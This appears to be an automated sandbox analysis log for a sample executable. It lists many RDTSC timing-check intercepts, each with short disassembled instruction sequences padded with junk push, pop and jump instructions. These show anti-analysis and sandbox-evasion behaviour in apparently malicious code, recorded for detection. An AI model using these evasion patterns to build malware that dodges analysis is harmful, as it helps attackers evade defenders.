Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 844DCA second address: 844DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 844DCE second address: 844DDB instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCBAD522AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 84520E second address: 845227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBACB2D11Dh 0x00000009 jnp 00007FCBACB2D116h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 845227 second address: 84522C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8447FB second address: 844800 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 844800 second address: 844806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8454E6 second address: 8454F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 pushad 0x00000008 jp 00007FCBACB2D116h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 845B0B second address: 845B0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 845B0F second address: 845B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 845B17 second address: 845B24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jo 00007FCBAD522AA6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 845B24 second address: 845B43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007FCBACB2D118h 0x0000000f jng 00007FCBACB2D11Eh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 845B43 second address: 845B5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCBAD522AB0h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 84901A second address: 84901E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 84901E second address: 849024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 849024 second address: 84902E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FCBACB2D116h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7C3518 second address: 7C3522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FCBAD522AA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7C3522 second address: 7C3537 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jng 00007FCBACB2D116h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jp 00007FCBACB2D116h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7C3537 second address: 7C353D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7C353D second address: 7C354E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jc 00007FCBACB2D11Eh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 84DD52 second address: 84DD56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 84DD56 second address: 84DD81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FCBACB2D124h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jns 00007FCBACB2D11Ch 0x00000011 popad 0x00000012 push edx 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 851BC3 second address: 851BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007FCBAD522AAEh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8516FB second address: 8516FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8516FF second address: 851722 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBAD522AB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ebx 0x0000000d pop esi 0x0000000e pushad 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 851722 second address: 851728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 851728 second address: 851741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FCBAD522AB2h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 853A78 second address: 853A82 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FCBACB2D11Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 85997A second address: 859983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 859AAD second address: 859ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push esi 0x00000008 jmp 00007FCBACB2D121h 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 859ACB second address: 859ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 859C26 second address: 859C2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 859D87 second address: 859D8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 859D8B second address: 859D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 859EC9 second address: 859EF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FCBAD522AA6h 0x0000000a popad 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e jmp 00007FCBAD522AAAh 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FCBAD522AAFh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 859EF7 second address: 859EFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 859EFB second address: 859EFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 859EFF second address: 859F21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c jmp 00007FCBACB2D126h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 859F21 second address: 859F25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8080D1 second address: 8080DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FCBACB2D116h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8080DB second address: 8080FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBAD522AAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007FCBAD522AA6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8080FA second address: 808112 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D124h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 808112 second address: 80812A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBAD522AB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80812A second address: 80816D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007FCBACB2D118h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 movsx ecx, dx 0x00000026 mov di, 1363h 0x0000002a push 00000004h 0x0000002c mov ecx, dword ptr [ebp+122D3750h] 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 jnl 00007FCBACB2D11Ch 0x0000003b rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 85ECCD second address: 85ECD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 85ECD2 second address: 85ECD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 85DF0E second address: 85DF1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FCBAD522AA6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 85DF1B second address: 85DF1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 85E0A3 second address: 85E0A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 85E0A9 second address: 85E0AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 85E0AF second address: 85E0B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 85E0B3 second address: 85E0B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 85E0B7 second address: 85E0E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBAD522AB7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FCBAD522AACh 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 85E872 second address: 85E887 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D121h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 85E887 second address: 85E890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 861B72 second address: 861B76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 861B76 second address: 861B8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBAD522AADh 0x00000007 ja 00007FCBAD522AA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8612CA second address: 8612E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D11Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007FCBACB2D116h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 861560 second address: 861564 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 861564 second address: 8615A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FCBACB2D131h 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FCBACB2D123h 0x00000014 pop esi 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8615A8 second address: 8615AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8615AC second address: 8615B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 861864 second address: 86186A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 86186A second address: 86186E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 86186E second address: 86187C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCBAD522AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 86187C second address: 861882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 861882 second address: 8618A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBAD522AB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8618A1 second address: 8618BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FCBACB2D122h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7C005E second address: 7C0085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FCBAD522AB1h 0x0000000c jmp 00007FCBAD522AAFh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7C0085 second address: 7C009B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D122h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 867695 second address: 86769B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 86769B second address: 8676AF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCBACB2D116h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007FCBACB2D116h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8676AF second address: 8676B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8676B3 second address: 8676B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8676B9 second address: 8676BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 867979 second address: 86799D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCBACB2D11Dh 0x0000000b jmp 00007FCBACB2D11Dh 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 86799D second address: 8679A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8679A1 second address: 8679CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBACB2D122h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push ebx 0x0000000d jmp 00007FCBACB2D120h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8679CE second address: 8679D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 86886D second address: 868884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBACB2D123h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 868884 second address: 8688A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push ecx 0x00000008 jmp 00007FCBAD522AAFh 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007FCBAD522AA6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8688A3 second address: 8688A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 869136 second address: 86913A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 86913A second address: 869140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 86DC9A second address: 86DCA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 86DCA0 second address: 86DCA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8709FE second address: 870A04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 870A04 second address: 870A13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FCBACB2D116h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 870B63 second address: 870B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBAD522AABh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 870CE8 second address: 870CEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8710F1 second address: 871107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FCBAD522AAEh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 871255 second address: 87125B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 87125B second address: 87126E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FCBAD522AAAh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 87126E second address: 871296 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCBACB2D116h 0x00000008 jmp 00007FCBACB2D121h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jnc 00007FCBACB2D116h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 871433 second address: 871437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 871437 second address: 871442 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 871584 second address: 871590 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 871590 second address: 871596 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
